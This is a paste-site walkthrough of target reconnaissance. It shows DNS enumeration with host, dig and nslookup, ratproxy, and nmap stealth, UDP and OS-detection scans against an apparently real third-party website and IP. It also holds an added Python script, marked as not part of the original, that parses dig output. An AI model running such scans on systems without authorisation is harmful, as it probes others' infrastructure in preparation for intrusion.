J4ck41
Untitled
May 30th, 2016
How To Scan A Target
RobertoRaimondo, May 29th, 2016

HOW TO SCAN A TARGET

1. First of all, locate the target that you want to scan.

TARGET

http://www.vyxunbnbs.com


HOW TO USE NSLOOKUP, DIG, HOST AND KNOCK TO GET DNS INFO ON THE TARGET MACHINE:

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[✗]─[root@parrot]─[~]
└──╼ #host -t a vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #host -t mx vyxunbnbs.com
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -t ns vyxunbnbs.com
vyxunbnbs.com name server ns67.domaincontrol.com.
vyxunbnbs.com name server ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #host -t txt vyxunbnbs.com
vyxunbnbs.com has no TXT record

┌─[root@parrot]─[~]
└──╼ #host -t cname vyxunbnbs.com
vyxunbnbs.com has no CNAME record

┌─[root@parrot]─[~]
└──╼ #host -t soa vyxunbnbs.com
vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com ns67.domaincontrol.com
Using domain server:
Name: ns67.domaincontrol.com
Address: 216.69.185.44#53
Aliases:

vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host vyxunbnbs.com ns68.domaincontrol.com
Using domain server:
Name: ns68.domaincontrol.com
Address: 208.109.255.44#53
Aliases:

vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5689
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN ANY

;; ANSWER SECTION:
vyxunbnbs.com. 510 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 455 IN A 198.71.232.3
vyxunbnbs.com. 2112 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 2112 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3455 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3455 IN NS ns68.domaincontrol.com.

Received 209 bytes from 127.0.0.1#53 in 18 ms

┌─[root@parrot]─[~]
└──╼ #host -t any vyxunbnbs.com
vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com name server ns68.domaincontrol.com.
vyxunbnbs.com name server ns67.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com
vyxunbnbs.com has address 198.71.232.3
vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -6 -a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14190
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN ANY

;; ANSWER SECTION:
vyxunbnbs.com. 471 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 416 IN A 198.71.232.3
vyxunbnbs.com. 2073 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 2073 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 3416 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3416 IN NS ns68.domaincontrol.com.

Received 209 bytes from ::1#53 in 14 ms

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com ns67.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 vyxunbnbs.com ns68.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 -t ns vyxunbnbs.com ns68.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host -6 -t ns vyxunbnbs.com ns67.domaincontrol.com
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #host 198.71.232.3
3.232.71.198.in-addr.arpa domain name pointer ip-198-71-232-3.ip.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #host -v -t a vyxunbnbs.com
Trying "vyxunbnbs.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21861
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 259 IN A 198.71.232.3

Received 47 bytes from 127.0.0.1#53 in 1 ms

┌─[root@parrot]─[~]
└──╼ #host -v -t a ip-198-71-232-3.ip.secureserver.net
Trying "ip-198-71-232-3.ip.secureserver.net"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38259
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ip-198-71-232-3.ip.secureserver.net. IN A

;; ANSWER SECTION:
ip-198-71-232-3.ip.secureserver.net. 3600 IN A 198.71.232.3

Received 69 bytes from 127.0.0.1#53 in 44 ms

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com a

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com a
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8729
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 164 IN A 198.71.232.3

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:00 CEST 2016
;; MSG SIZE rcvd: 58

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com mx

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com mx
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62678
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN MX

;; ANSWER SECTION:
vyxunbnbs.com. 1816 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 1816 IN MX 0 smtp.secureserver.net.

;; Query time: 19 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:04 CEST 2016
;; MSG SIZE rcvd: 106

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com ns

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com ns
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60292
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN NS

;; ANSWER SECTION:
vyxunbnbs.com. 3156 IN NS ns68.domaincontrol.com.
vyxunbnbs.com. 3156 IN NS ns67.domaincontrol.com.

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:07 CEST 2016
;; MSG SIZE rcvd: 94

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com txt

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com txt
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36884
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN TXT

;; AUTHORITY SECTION:
vyxunbnbs.com. 180 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:13 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com soa

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com soa
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN SOA

;; ANSWER SECTION:
vyxunbnbs.com. 200 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 12 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:18 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com cname

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com cname
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22218
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN CNAME

;; AUTHORITY SECTION:
vyxunbnbs.com. 171 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:18:38 CEST 2016
;; MSG SIZE rcvd: 110

┌─[root@parrot]─[~]
└──╼ #dig +trace vyxunbnbs.com

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> +trace vyxunbnbs.com
;; global options: +cmd
. 287648 IN NS c.root-servers.net.
. 287648 IN NS i.root-servers.net.
. 287648 IN NS d.root-servers.net.
. 287648 IN NS a.root-servers.net.
. 287648 IN NS f.root-servers.net.
. 287648 IN NS b.root-servers.net.
. 287648 IN NS l.root-servers.net.
. 287648 IN NS k.root-servers.net.
. 287648 IN NS g.root-servers.net.
. 287648 IN NS e.root-servers.net.
. 287648 IN NS m.root-servers.net.
. 287648 IN NS h.root-servers.net.
. 287648 IN NS j.root-servers.net.
. 510154 IN RRSIG NS 8 0 518400 20160608050000 20160529040000 60615 . LS0Bk52wYFCmp8Sk08+ePPeZV1ar3AciH05VrH5wlzpc5L1j7fW+Td6b 6yN+34QBVGQ+U0YqDCg8K63nUFxdEY1zGW2v9YjzvdNwVI7UnLIpqNK7 KNny7GHnoS/iB5T6wGeoXlJrlmCqGrhtbAuXdlkbViOELcbpK5ZvGs6L w3s=
;; Received 397 bytes from 127.0.0.1#53(127.0.0.1) in 264 ms

com. 172800 IN NS l.gtld-servers.net.
com. 172800 IN NS c.gtld-servers.net.
com. 172800 IN NS f.gtld-servers.net.
com. 172800 IN NS h.gtld-servers.net.
com. 172800 IN NS b.gtld-servers.net.
com. 172800 IN NS k.gtld-servers.net.
com. 172800 IN NS e.gtld-servers.net.
com. 172800 IN NS j.gtld-servers.net.
com. 172800 IN NS m.gtld-servers.net.
com. 172800 IN NS i.gtld-servers.net.
com. 172800 IN NS g.gtld-servers.net.
com. 172800 IN NS a.gtld-servers.net.
com. 172800 IN NS d.gtld-servers.net.
com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
com. 86400 IN RRSIG DS 8 1 86400 20160608050000 20160529040000 60615 . D/SvLl6M/vyF6MOKUE220+xQgbpwKHLA+7eJedh6oJwvXiXB6QAPalag hfjxDtzqQ71OYQk0TyOOcW2CaTqduszIQjf/ckB9RAds1aip3b+BWMvq lSFtLCuKsFmKZkkAhhlNZRyVFc9s8wLW+G/RL52sQpRGMBLo3etB2/uX ckg=
;; Received 737 bytes from 192.36.148.17#53(i.root-servers.net) in 305 ms

vyxunbnbs.com. 172800 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 172800 IN NS ns68.domaincontrol.com.
CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20160603045915 20160527034915 34745 com. pkQ5LWptuG019VnVIJOYy/noEwncYk2kml2Qkf+aTLF7lPHdRvcCkC0h ruJdoZAMHgX7byAmPSR9vi8q6OvKdXVmsMKfUBdLMNMpUhaBHpcTe1AI ezemeJmvAjVyqo7wVYwGa1/Y9ZHuUC9zKmc1xGbtP+jB/GiZHz9vShwH ohc=
9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN NSEC3 1 1 0 - 9M17MO9DKQOAC1TE5B8KURUTFNKS98J7 NS DS RRSIG
9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN RRSIG NSEC3 8 2 86400 20160604043916 20160528032916 34745 com. Cfkvje5CuuZtOQPGsBBMYJm3/6g3IRh7U6QorY6chCMhRiMWGAXKTwQL 84cGbqkma5Iz9A3BwYRdSqx9u27Ou2QA3ipt8zKJaD6ed0IeI2SbU8QZ HLuKxAcheIIqTf1pHy2cvkEjMDW6k3EHqdKR1goBKrESteb7ZPW7v0hY ih8=
;; Received 611 bytes from 192.5.6.30#53(a.gtld-servers.net) in 122 ms

vyxunbnbs.com. 600 IN A 198.71.232.3
vyxunbnbs.com. 3600 IN NS ns68.domaincontrol.com.
vyxunbnbs.com. 3600 IN NS ns67.domaincontrol.com.
;; Received 110 bytes from 208.109.255.44#53(ns68.domaincontrol.com) in 30 ms

┌─[root@parrot]─[~]
└──╼ #dig +short vyxunbnbs.com
198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig +noall +answer vyxunbnbs.com any
vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 53 IN A 198.71.232.3
vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #dig -x +short 198.71.232.3

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> -x +short 198.71.232.3
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54927
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;+short.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
in-addr.arpa. 3599 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073655 1800 900 604800 3600

;; Query time: 11 msec
;; SERVER: ::1#53(::1)
;; WHEN: Sun May 29 14:21:01 CEST 2016
;; MSG SIZE rcvd: 116

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27483
;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;198.71.232.3. IN A

;; ANSWER SECTION:
198.71.232.3. 0 IN A 198.71.232.3

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 14:21:01 CEST 2016
;; MSG SIZE rcvd: 57

┌─[root@parrot]─[~]
└──╼ #dig -x 198.71.232.3 +short
ip-198-71-232-3.ip.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #dig +nssearch vyxunbnbs.com
SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 216.69.185.44 in 30 ms.
SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 208.109.255.44 in 30 ms.
;; connection timed out; no servers could be reached

┌─[✗]─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer a vyxunbnbs.com
vyxunbnbs.com. 600 IN A 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer mx vyxunbnbs.com
vyxunbnbs.com. 1529 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1529 IN MX 10 mailstore1.secureserver.net.

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer ns vyxunbnbs.com
vyxunbnbs.com. 2868 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 2868 IN NS ns68.domaincontrol.com.

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer cname vyxunbnbs.com

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer txt vyxunbnbs.com

┌─[root@parrot]─[~]
└──╼ #dig +nocmd +noall +answer url vyxunbnbs.com
vyxunbnbs.com. 554 IN A 198.71.232.3

┌─[root@parrot]─[~]
└──╼ #dig vyxunbnbs.com +dnssec

; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com +dnssec
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12137
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;vyxunbnbs.com. IN A

;; ANSWER SECTION:
vyxunbnbs.com. 446 IN A 198.71.232.3

;; Query time: 16 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun May 29 15:14:48 CEST 2016
;; MSG SIZE rcvd: 58

┌─[root@parrot]─[/home/roy/Desktop]
└──╼ #nslookup
> set type=A
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
Name: vyxunbnbs.com
Address: 198.71.232.3
> set type=MX
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com mail exchanger = 0 smtp.secureserver.net.
vyxunbnbs.com mail exchanger = 10 mailstore1.secureserver.net.

Authoritative answers can be found from:
> set type=ns
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com nameserver = ns68.domaincontrol.com.
vyxunbnbs.com nameserver = ns67.domaincontrol.com.

Authoritative answers can be found from:
> set type=cname
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

www.vyxunbnbs.com canonical name = vyxunbnbs.com.

┌─[root@parrot]─[~]
└──╼ #nslookup
> set type=TXT
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.

Authoritative answers can be found from:
vyxunbnbs.com
origin = ns67.domaincontrol.com
mail addr = dns.jomax.net
serial = 2016052700
refresh = 28800
retry = 7200
expire = 604800
minimum = 600
>

> set type=SOA
> www.vyxunbnbs.com
Server: 127.0.0.1
Address: 127.0.0.1#53

Non-authoritative answer:
www.vyxunbnbs.com canonical name = vyxunbnbs.com.
vyxunbnbs.com
origin = ns67.domaincontrol.com
mail addr = dns.jomax.net
serial = 2016052700
refresh = 28800
retry = 7200
expire = 604800
minimum = 600

Authoritative answers can be found from:
>


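The session above queries the same zone many ways and then asks each authoritative server (ns67 and ns68) separately. The added example below, which is not part of the original paste and not a tool the page uses, parses the record lines that `dig +noall +answer` prints into structured records, summarises them, and checks that the answers collected from several servers carry the same record set. The sample text is constructed from the page's own output; the function names and the assumption that each per-server answer was captured with `dig @server +noall +answer <zone> any` are this example's own.

```python
"""Parse `dig +noall +answer` record lines and compare answers across servers.

Added example, not code from the original paste. SAMPLE_ANSWER is constructed
from the `dig +noall +answer vyxunbnbs.com any` output shown on the page.
"""
from collections import defaultdict

# Constructed sample: the answer-section lines as printed on the page.
SAMPLE_ANSWER = """\
vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
vyxunbnbs.com. 53 IN A 198.71.232.3
vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.
"""

SOA_FIELDS = ("mname", "rname", "serial", "refresh", "retry", "expire", "minimum")


def parse_answer(text):
    """Turn dig presentation-format lines into dicts {name, ttl, type, data}.

    data is a string for A/NS/CNAME/TXT, a (preference, host) tuple for MX and
    a dict of the seven SOA fields for SOA. Comment lines (";") and blanks are
    skipped, so the full `dig` output can be fed in as well as +noall +answer.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split()
        if len(parts) < 5 or parts[2] != "IN":
            continue  # not an answer line in dig's presentation format
        name, ttl, rtype, rdata = parts[0], int(parts[1]), parts[3], parts[4:]
        if rtype == "MX":
            data = (int(rdata[0]), rdata[1])
        elif rtype == "SOA":
            data = dict(zip(SOA_FIELDS, rdata[:2] + [int(x) for x in rdata[2:7]]))
        else:
            data = " ".join(rdata)
        records.append({"name": name.rstrip("."), "ttl": ttl, "type": rtype, "data": data})
    return records


def summarize(records):
    """Group records by type; MX sorted by preference (lowest is tried first)."""
    by_type = defaultdict(list)
    for r in records:
        by_type[r["type"]].append(r["data"])
    return {
        "addresses": sorted(by_type["A"]),
        "mail_exchangers": sorted(by_type["MX"]),
        "name_servers": sorted(by_type["NS"]),
        "soa": by_type["SOA"][0] if by_type["SOA"] else None,
    }


def servers_agree(responses):
    """True if every captured answer (one string per authoritative server,
    assumed taken with `dig @server +noall +answer <zone> any`) carries the
    same record set. TTLs are ignored; the SOA serial is compared, so a
    secondary that has not picked up a zone change is reported as a mismatch.
    A persistent divergence between the listed name servers is worth a
    monitoring alert, as it points at a stale or misconfigured server."""
    normalised = []
    for text in responses:
        recs = parse_answer(text)
        normalised.append(sorted((r["type"], str(r["data"])) for r in recs))
    return all(n == normalised[0] for n in normalised)


if __name__ == "__main__":
    for key, value in summarize(parse_answer(SAMPLE_ANSWER)).items():
        print(f"{key}: {value}")
    print("servers agree:", servers_agree([SAMPLE_ANSWER, SAMPLE_ANSWER]))
```

Feed `servers_agree` one captured answer per name server listed in the NS set; the page queries ns67 and ns68 separately with `host`, and the same idea applied with `dig @server` output is what this check consumes.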
RUN RATPROXY

┌─[root@parrot]─[~]
└──╼ #ratproxy
ratproxy version 1.58-beta by <lcamtuf@google.com>

[!] WARNING: Running with no command-line config options specified. This is
almost certainly not what you want, as most checks are disabled. Please
consult the documentation or use --help for more information.

[*] Proxy configured successfully. Have fun, and please do not be evil.
[+] Accepting connections on port 8080/tcp (local only)...

Do not close this window: minimize it and open a new terminal.


RUN NMAP

┌─[✗]─[root@parrot]─[~]
└──╼ #nmap -sV -Pn 198.71.232.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:03 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Samsung AllShare httpd
443/tcp open ssl/http Samsung AllShare httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds


┌─[root@parrot]─[~]
└──╼ #nmap -sS -sU -T4 -A -v 198.71.232.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:04 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating NSE at 12:04
Completed NSE at 12:04, 0.00s elapsed
Initiating Ping Scan at 12:04
Scanning 198.71.232.3 [4 ports]
Completed Ping Scan at 12:04, 0.11s elapsed (1 total hosts)
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating SYN Stealth Scan at 12:04
Scanning 198.71.232.3 [1000 ports]
Discovered open port 443/tcp on 198.71.232.3
Discovered open port 80/tcp on 198.71.232.3
Completed SYN Stealth Scan at 12:04, 9.18s elapsed (1000 total ports)
Initiating UDP Scan at 12:04
Scanning 198.71.232.3 [1000 ports]
Completed UDP Scan at 12:05, 5.55s elapsed (1000 total ports)
Initiating Service scan at 12:05
Scanning 1002 services on 198.71.232.3
Service scan Timing: About 0.40% done
Service scan Timing: About 3.29% done; ETC: 13:33 (1:25:39 remaining)
Service scan Timing: About 6.29% done; ETC: 13:14 (1:05:05 remaining)
Service scan Timing: About 9.28% done; ETC: 13:07 (0:57:01 remaining)
Service scan Timing: About 12.28% done; ETC: 13:04 (0:52:10 remaining)
Service scan Timing: About 15.27% done; ETC: 13:02 (0:48:33 remaining)
Service scan Timing: About 20.86% done; ETC: 12:54 (0:39:05 remaining)
Service scan Timing: About 21.26% done; ETC: 12:59 (0:43:13 remaining)
Service scan Timing: About 26.75% done; ETC: 12:54 (0:36:12 remaining)
Service scan Timing: About 27.25% done; ETC: 12:58 (0:38:57 remaining)
Service scan Timing: About 32.73% done; ETC: 12:54 (0:33:09 remaining)
Service scan Timing: About 38.72% done; ETC: 12:54 (0:30:09 remaining)
Service scan Timing: About 44.71% done; ETC: 12:54 (0:27:10 remaining)
Service scan Timing: About 50.70% done; ETC: 12:54 (0:24:12 remaining)
Service scan Timing: About 56.69% done; ETC: 12:54 (0:21:14 remaining)
Service scan Timing: About 62.67% done; ETC: 12:54 (0:18:18 remaining)
Service scan Timing: About 68.56% done; ETC: 12:54 (0:15:25 remaining)
Service scan Timing: About 74.55% done; ETC: 12:54 (0:12:29 remaining)
Service scan Timing: About 80.54% done; ETC: 12:54 (0:09:32 remaining)
Service scan Timing: About 86.03% done; ETC: 12:54 (0:06:53 remaining)
Service scan Timing: About 92.02% done; ETC: 12:54 (0:03:56 remaining)
Service scan Timing: About 98.00% done; ETC: 12:54 (0:00:59 remaining)
Completed Service scan at 12:54, 2976.47s elapsed (1002 services on 1 host)
Initiating OS detection (try #1) against 198.71.232.3
Retrying OS detection (try #2) against 198.71.232.3
Initiating Traceroute at 12:54
Completed Traceroute at 12:54, 3.05s elapsed
NSE: Script scanning 198.71.232.3.
Initiating NSE at 12:54
Completed NSE at 12:58, 216.46s elapsed
Initiating NSE at 12:58
Completed NSE at 12:58, 0.24s elapsed
Nmap scan report for 198.71.232.3
Host is up (0.11s latency).
Not shown: 1000 open|filtered ports, 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Samsung AllShare httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: DPS/1.0.3
|_http-title: 404 Not Found
443/tcp open ssl/http Samsung AllShare httpd
|_http-server-header: DPS/1.0.3
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=*.godaddysites.com/organizationName=GoDaddy.com, LLC/stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=Go Daddy Secure Certification Authority/organizationName=GoDaddy.com, Inc./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2013-12-09T21:03:50
| Not valid after: 2016-12-09T21:03:50
| MD5: b9fa bb00 6886 5d4c 47be 2cae 6529 fdce
|_SHA-1: 95a5 92da fdd9 dcb8 e554 5599 1d1b 5ae1 7f0f d2c7
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Uptime guess: 0.003 days (since Sun May 29 12:53:57 2016)
